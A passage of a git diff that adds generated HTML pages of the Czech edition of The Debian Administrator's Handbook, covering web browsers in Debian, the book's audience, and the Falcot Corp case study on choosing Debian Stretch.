+                class="userinput"><code>yum --assumeyes --installroot $rootdir groupinstall core
+</code></strong><code
+                class="computeroutput">[...]
+# </code><strong
+                class="userinput"><code>sed -i -e "s,gpgkey=file://${rootdir}/etc/,gpgkey=file:///etc/,g" $rootdir/etc/yum.repos.d/*.repo
+</code></strong></pre></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="advanced-administration.html"><strong>Předcházející</strong>Kapitola 12. Advanced Administration</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.automated-installation.html"><strong>Další</strong>12.3. Automated Installation</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.web-browsers.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.web-browsers.html
new file mode 100644
index 000000000..4fbc50f4a
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.web-browsers.html
@@ -0,0 +1,180 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">13.5. Web Browsers</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Workstation, Graphical desktop, Office work, X.org" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><link
+        rel="prev"
+        href="sect.main-desktop-tools.html"
+        title="13.4. Email" /><link
+        rel="next"
+        href="sect.development.html"
+        title="13.6. Development" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.web-browsers.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.main-desktop-tools.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.development.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.web-browsers"></a>13.5. Web Browsers</h2></div></div></div><a
+          id="id-1.16.8.2"
+          class="indexterm"></a><a
+          id="id-1.16.8.3"
+          class="indexterm"></a><div
+          class="para">
+			Epiphany, the web browser in the GNOME suite, uses the WebKit display engine developed by Apple for its Safari browser. The relevant package is <span
+            class="pkg pkg">epiphany-browser</span>.
+		</div><a
+          id="id-1.16.8.5"
+          class="indexterm"></a><a
+          id="id-1.16.8.6"
+          class="indexterm"></a><div
+          class="para">
+			Konqueror, available in the <span
+            class="pkg pkg">konqueror</span> package, is KDE's web browser (but can also assume the role of a file manager). It uses the KDE-specific KHTML rendering engine; KHTML is an excellent engine, as witnessed by the fact that Apple's WebKit is based on KHTML. <a
+            id="id-1.16.8.7.2"
+            class="indexterm"></a>
+		</div><div
+          class="para">
+			Users not satisfied by either of the above can use Firefox. This browser, available in the <span
+            class="pkg pkg">firefox-esr</span> package, uses the Mozilla project's Gecko renderer, with a thin and extensible interface on top. <a
+            id="id-1.16.8.8.2"
+            class="indexterm"></a> <a
+            id="id-1.16.8.8.3"
+            class="indexterm"></a> <a
+            id="id-1.16.8.8.4"
+            class="indexterm"></a>
+		</div><div
+          class="figure"><a
+            xmlns=""
+            id="id-1.16.8.9"></a><div
+            class="figure-contents"><div
+              class="mediaobject"><img
+                src="images/firefox.png"
+                alt="The Firefox web browser" /></div></div><p
+            class="title"><strong>Obrázek 13.7. The Firefox web browser</strong></p></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>VOCABULARY</em></span> Firefox ESR</strong></p></div></div></div><a
+            id="id-1.16.8.10.2"
+            class="indexterm"></a><div
+            class="para">
+			Mozilla has a very fast-paced release cycle for Firefox. New releases are published every six to eight weeks and only the latest version is supported for security issues. This doesn't suit all kind of users so, every 10 cycles, they are promoting one of their release to an <span
+              class="emphasis"><em>Extended Support Release</em></span> (ESR) which will get security updates (and no functional changes) during the next 10 cycles (which covers a bit more than a year).
+		</div><div
+            class="para">
+			Debian has both versions packaged. The ESR one, in the package <span
+              class="pkg pkg">firefox-esr</span>, is used by default since it is the only version suitable for Debian <span
+              class="distribution distribution">Stable</span> with its long support period (and even there Debian has to upgrade from one ESR release to the next multiple times during a Debian Stable lifecycle). The regular Firefox is available in the <span
+              class="pkg pkg">firefox</span> package but it is only available to users of Debian <span
+              class="distribution distribution">Unstable</span>.
+		</div></div><div
+          class="sidebar"><a
+            xmlns=""
+            id="sidebar.firefox-iceweasel"></a><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>CULTURE</em></span> Iceweasel, Firefox and others</strong></p></div></div></div><a
+            id="id-1.16.8.11.2"
+            class="indexterm"></a><a
+            id="id-1.16.8.11.3"
+            class="indexterm"></a><div
+            class="para">
+			Before Debian <span
+              class="distribution distribution">Stretch</span>, Firefox and Thunderbird were missing. The <span
+              class="pkg pkg">iceweasel</span> package contained Iceweasel, which was basically Firefox under another name.
+		</div><div
+            class="para">
+			The rationale behind this renaming was a result of the usage rules imposed by the Mozilla Foundation on the <span
+              class="trademark">Firefox</span>™ registered trademark: any software named Firefox had to use the official Firefox logo and icons. However, since these elements are not released under a free license, Debian could not distribute them in its <span
+              class="emphasis"><em>main</em></span> section. Rather than moving the whole browser to <span
+              class="emphasis"><em>non-free</em></span>, the package maintainer choose to use a different name.
+		</div><div
+            class="para">
+			For similar reasons, the <span
+              class="trademark">Thunderbird</span>™ email client was renamed to Icedove in a similar fashion.
+		</div><div
+            class="para">
+			Nowadays, the logo and icons are distributed under a free software license and Mozilla recognized that the changes made by the Debian project are respecting their trademark license so Debian is again able to ship Mozilla's applications under their official name.
+		</div></div><a
+          id="id-1.16.8.12"
+          class="indexterm"></a><a
+          id="id-1.16.8.13"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>CULTURE</em></span> Mozilla</strong></p></div></div></div><div
+            class="para">
+			Netscape Navigator was the standard browser when the web started reaching the masses, but lost ground when Microsoft bundled Internet Explorer with Windows and signed contracts with computer manufacturers which forbade them from pre-installing Netscape Navigator. Faced with this failure, Netscape (the company) decided to “free” its source code, by releasing it under a free license, to give it a second life. This was the beginning of the Mozilla project. After many years of development, the results are more than satisfying: the Mozilla project brought forth an HTML rendering engine (called Gecko) that is among the most standard-compliant. This rendering engine is in particular used by the Mozilla Firefox browser, which is one of the most successful browsers, with a fast-growing user base.
+		</div><a
+            id="id-1.16.8.14.3"
+            class="indexterm"></a><a
+            id="id-1.16.8.14.4"
+            class="indexterm"></a></div><div
+          class="para">
+			Last but not least, Debian also contains the <span
+            class="emphasis"><em>Chromium</em></span> web browser (available in the <span
+            class="pkg pkg">chromium</span> package). This browser is developed by Google at such a fast pace that maintaining a single version of it across the whole lifespan of Debian <span
+            class="distribution distribution">Stretch</span> is unlikely to be possible. Its clear purpose is to make web services more attractive, both by optimizing the browser for performance and by increasing the user's security. The free code that powers Chromium is also used by its proprietary version called Google Chrome.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.main-desktop-tools.html"><strong>Předcházející</strong>13.4. Email</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.development.html"><strong>Další</strong>13.6. Development</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.who-is-this-book-for.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.who-is-this-book-for.html
new file mode 100644
index 000000000..500eacaa9
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.who-is-this-book-for.html
@@ -0,0 +1,85 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">2. Pro koho je tato kniha?</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="foreword.html"
+        title="Předmluva" /><link
+        rel="prev"
+        href="foreword.html"
+        title="Předmluva" /><link
+        rel="next"
+        href="sect.selected-approach.html"
+        title="3. Obecný přístup" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.who-is-this-book-for.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="foreword.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.selected-approach.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.who-is-this-book-for"></a>2. Pro koho je tato kniha?</h2></div></div></div><div
+          class="para">
+			Snažili jsme se, aby tato kniha byla užitečná pro více kategorií čtenářů. Zaprvé, správci systémů (začátečníci i zkušení) najdou vysvětlení instalace a nasazení Debianu na více počítačích. Budou mít také přehled o většině služeb, které jsou v Debianu k dispozici, spolu s odpovídajícími konfiguračními pokyny a popisem specifik pocházejících z distribuce. Pochopení mechanismů, použitých při vývoji Debianu, jim umožní vypořádat se s nepředvídanými problémy, s tím, že mohou vždy najít pomoc v rámci komunity.
+		</div><div
+          class="para">
+			Uživatelé jiné linuxové distribuce nebo jiné varianty Unixu objevoví specifika Debianu a měli by být velmi rychle akceschopní a zároveň plně těžit z jedinečných výhod této distribuce.
+		</div><div
+          class="para">
+			A konečně, čtenáři, kteří již mají nějaké znalosti o Debianu a chtějí se dozvědět více o komunitě stojící za ním by měli mít svá očekávání naplněna. Tato kniha by je měla přiblížit k tomu se k nám připojit a stát se přispěvateli.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="foreword.html"><strong>Předcházející</strong>Předmluva</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.selected-approach.html"><strong>Další</strong>3. Obecný přístup</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.why-debian-stable.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.why-debian-stable.html
new file mode 100644
index 000000000..712dce743
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.why-debian-stable.html
@@ -0,0 +1,86 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">2.5. Why Debian Stretch?</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Falcot Corp, SMB, Strong Growth, Master Plan, Migration, Cost Reduction" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="case-study.html"
+        title="Kapitola 2. Presenting the Case Study" /><link
+        rel="prev"
+        href="sect.why-debian.html"
+        title="2.4. Why the Debian Distribution?" /><link
+        rel="next"
+        href="existing-setup.html"
+        title="Kapitola 3. Analyzing the Existing Setup and Migrating" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.why-debian-stable.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.why-debian.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="existing-setup.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.why-debian-stable"></a>2.5. Why Debian Stretch?</h2></div></div></div><div
+          class="para">
+			Every Debian release starts its life as a continuously changing distribution, also known as “<span
+            class="distribution distribution">Testing</span>”. But at the time we write those lines, Debian Stretch is the latest “<span
+            class="distribution distribution">Stable</span>” version of Debian.
+		</div><div
+          class="para">
+			The choice of Debian Stretch is well justified based on the fact that any administrator concerned about the quality of their servers will naturally gravitate towards the stable version of Debian. Even if the previous stable release might still be supported for a while, Falcot administrators aren't considering it because its support period will not last long enough and because the latest version brings new interesting features that they care about.
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.why-debian.html"><strong>Předcházející</strong>2.4. Why the Debian Distribution?</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="existing-setup.html"><strong>Další</strong>Kapitola 3. Analyzing the Existing Setup and Migr...</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.why-debian.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.why-debian.html
new file mode 100644
index 000000000..e94d849a9
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.why-debian.html
@@ -0,0 +1,155 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">2.4. Why the Debian Distribution?</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Falcot Corp, SMB, Strong Growth, Master Plan, Migration, Cost Reduction" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="case-study.html"
+        title="Kapitola 2. Presenting the Case Study" /><link
+        rel="prev"
+        href="sect.why-gnu-linux.html"
+        title="2.3. Why a GNU/Linux Distribution?" /><link
+        rel="next"
+        href="sect.why-debian-stable.html"
+        title="2.5. Why Debian Stretch?" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.why-debian.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.why-gnu-linux.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.why-debian-stable.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.why-debian"></a>2.4. Why the Debian Distribution?</h2></div></div></div><div
+          class="para">
+			Once the Linux family has been selected, a more specific option must be chosen. Again, there are plenty of criteria to consider. The chosen distribution must be able to operate for several years, since the migration from one to another would entail additional costs (although less than if the migration were between two totally different operating systems, such as Windows or OS X).
+		</div><div
+          class="para">
+			Sustainability is, thus, essential, and it must guarantee regular updates and security patches over several years. The timing of updates is also significant, since, with so many machines to manage, Falcot Corp can not handle this complex operation too frequently. The IT department, therefore, insists on running the latest stable version of the distribution, benefiting from the best technical assistance, and guaranteed security patches. In effect, security updates are generally only guaranteed for a limited duration on older versions of a distribution.
+		</div><div
+          class="para">
+			Finally, for reasons of homogeneity and ease of administration, the same distribution must run on all the servers and office computers.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.5.8.5"></a>2.4.1. Commercial and Community Driven Distributions</h3></div></div></div><div
+            class="para">
+				There are two main categories of Linux distributions: commercial and community driven. The former, developed by companies, are sold with commercial support services. The latter are developed according to the same open development model as the free software of which they are comprised.
+			</div><div
+            class="para">
+				A commercial distribution will have, thus, a tendency to release new versions more frequently, in order to better market updates and associated services. Their future is directly connected to the commercial success of their company, and many have already disappeared (Caldera Linux, StormLinux, Mandriva Linux, etc.).
+			</div><div
+            class="para">
+				A community distribution doesn't follow any schedule but its own. Like the Linux kernel, new versions are released when they are stable, never before. Its survival is guaranteed, as long as it has enough individual developers or third party companies to support it.
+			</div><a
+            id="id-1.5.8.5.5"
+            class="indexterm"></a><a
+            id="id-1.5.8.5.6"
+            class="indexterm"></a><div
+            class="para">
+				A comparison of various Linux distributions led to the choice of Debian for various reasons:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						It is a community distribution, with development ensured independently from any commercial constraints; its objectives are, thus, essentially of a technical nature, which seem to favor the overall quality of the product.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Of all community distributions, it is the most significant from many perspectives: in number of contributors, number of software packages available, and years of continuous existence. The size of its community is an incontestable witness to its continuity.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Statistically, new versions are released every 18 to 24 months, and they are supported for 5 years, a schedule which is agreeable to administrators.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						A survey of several French service companies specialized in free software has shown that all of them provide technical assistance for Debian; it is also, for many of them, their chosen distribution, internally. This diversity of potential providers is a major asset for Falcot Corp's independence.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Finally, Debian is available on a multitude of architectures, including ppc64el for OpenPOWER processors; it will, thus, be possible to install it on Falcot Corp's latest IBM servers.
+					</div></li></ul></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>IN PRACTICE</em></span> Debian Long Term Support</strong></p></div></div></div><div
+              class="para">
+				The Debian Long Term Support (LTS) project started in 2014 and aims to provide 5 years of security support to all stable Debian releases. As LTS is of primary importance to organizations with large deployments, the project tries to pool resources from Debian-using companies. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://wiki.debian.org/LTS">https://wiki.debian.org/LTS</a></div>
+			</div><div
+              class="para">
+				Falcot Corp is not big enough to let one member of its IT staff contribute to the LTS project, so the company opted to subscribe to Freexian's Debian LTS contract and provides financial support. Thanks to this, the Falcot administrators know that the packages they use will be handled in priority and they have a direct contact with the LTS team in case of problems. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://wiki.debian.org/LTS/Funding">https://wiki.debian.org/LTS/Funding</a></div> <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.freexian.com/services/debian-lts.html">https://www.freexian.com/services/debian-lts.html</a></div>
+			</div></div><div
+            class="para">
+				Once Debian has been chosen, the matter of which version to use must be decided. Let us see why the administrators have picked Debian Stretch.
+			</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.why-gnu-linux.html"><strong>Předcházející</strong>2.3. Why a GNU/Linux Distribution?</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.why-debian-stable.html"><strong>Další</strong>2.5. Why Debian Stretch?</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.why-gnu-linux.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.why-gnu-linux.html
new file mode 100644
index 000000000..e7cfe6d21
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.why-gnu-linux.html
@@ -0,0 +1,132 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">2.3. Why a GNU/Linux Distribution?</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Falcot Corp, SMB, Strong Growth, Master Plan, Migration, Cost Reduction" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="case-study.html"
+        title="Kapitola 2. Presenting the Case Study" /><link
+        rel="prev"
+        href="sect.master-plan.html"
+        title="2.2. Master Plan" /><link
+        rel="next"
+        href="sect.why-debian.html"
+        title="2.4. Why the Debian Distribution?" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.why-gnu-linux.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.master-plan.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.why-debian.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.why-gnu-linux"></a>2.3. Why a GNU/Linux Distribution?</h2></div></div></div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> Linux or GNU/Linux?</strong></p></div></div></div><a
+            id="id-1.5.7.2.2"
+            class="indexterm"></a><a
+            id="id-1.5.7.2.3"
+            class="indexterm"></a><div
+            class="para">
+			Linux, as you already know, is only a kernel. The expressions, “Linux distribution” and “Linux system” are, thus, incorrect: they are, in reality, distributions or systems <span
+              class="emphasis"><em>based on</em></span> Linux. These expressions fail to mention the software that always completes this kernel, among which are the programs developed by the GNU Project. Dr. Richard Stallman, founder of this project, insists that the expression “GNU/Linux” be systematically used, in order to better recognize the important contributions made by the GNU Project and the principles of freedom upon which they are founded.
+		</div><div
+            class="para">
+			Debian has chosen to follow this recommendation, and, thus, name its distributions accordingly (thus, the latest stable release is Debian GNU/Linux 9).
+		</div></div><div
+          class="para">
+			Several factors have dictated this choice. The system administrator, who was familiar with this distribution, ensured it was listed among the candidates for the computer system overhaul. Difficult economic conditions and ferocious competition have limited the budget for this operation, despite its critical importance for the future of the company. This is why Open Source solutions were swiftly chosen: several recent studies indicate they are less expensive than proprietary solutions while providing equal or better quality of service so long as qualified personnel are available to run them.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>IN PRACTICE</em></span> Total cost of ownership (TCO)</strong></p></div></div></div><a
+            id="id-1.5.7.4.2"
+            class="indexterm"></a><a
+            id="id-1.5.7.4.3"
+            class="indexterm"></a><div
+            class="para">
+			The Total Cost of Ownership is the total of all money expended for the possession or acquisition of an item, in this case referring to the operating system. This price includes any possible license fee, costs for training personnel to work with the new software, replacement of machines that are too slow, additional repairs, etc. Everything arising directly from the initial choice is taken into account.
+		</div><div
+            class="para">
+			This TCO, which varies according to the criteria chosen in the assessment thereof, is rarely significant when taken in isolation. However, it is very interesting to compare TCOs for different options if they are calculated according to the same rules. This assessment table is, thus, of paramount importance, and it is easy to manipulate it in order to draw a predefined conclusion. Thus, the TCO for a single machine doesn't make sense, since the cost of an administrator is also reflected in the total number of machines they manage, a number which obviously depends on the operating system and tools proposed.
+		</div></div><div
+          class="para">
+			Among free operating systems, the IT department looked at the free BSD systems (OpenBSD, FreeBSD, and NetBSD), GNU Hurd, and Linux distributions. GNU Hurd, which has not yet released a stable version, was immediately rejected. The choice is simpler between BSD and Linux. The former have many merits, especially on servers. Pragmatism, however, led to choosing a Linux system, since its installed base and popularity are both very significant and have many positive consequences. One of these consequences is that it is easier to find qualified personnel to administer Linux machines than technicians experienced with BSD. Furthermore, Linux adapts to newer hardware faster than BSD (although they are often neck and neck in this race). Finally, Linux distributions are often more adapted to user-friendly graphical user interfaces, indispensable for beginners during migration of all office machines to a new system.
+		</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ALTERNATIVE</em></span> Debian GNU/kFreeBSD</strong></p></div></div></div><a
+            id="id-1.5.7.6.2"
+            class="indexterm"></a><a
+            id="id-1.5.7.6.3"
+            class="indexterm"></a><a
+            id="id-1.5.7.6.4"
+            class="indexterm"></a><div
+            class="para">
+			Since Debian 6 <span
+              class="distribution distribution">Squeeze</span>, it is possible to use Debian with a FreeBSD kernel on 32 and 64 bit computers; this is what the <code
+              class="literal">kfreebsd-i386</code> and <code
+              class="literal">kfreebsd-amd64</code> architectures mean. While these architectures are not “official release architectures”, about 90 % of the software packaged by Debian is available for them.
+		</div><div
+            class="para">
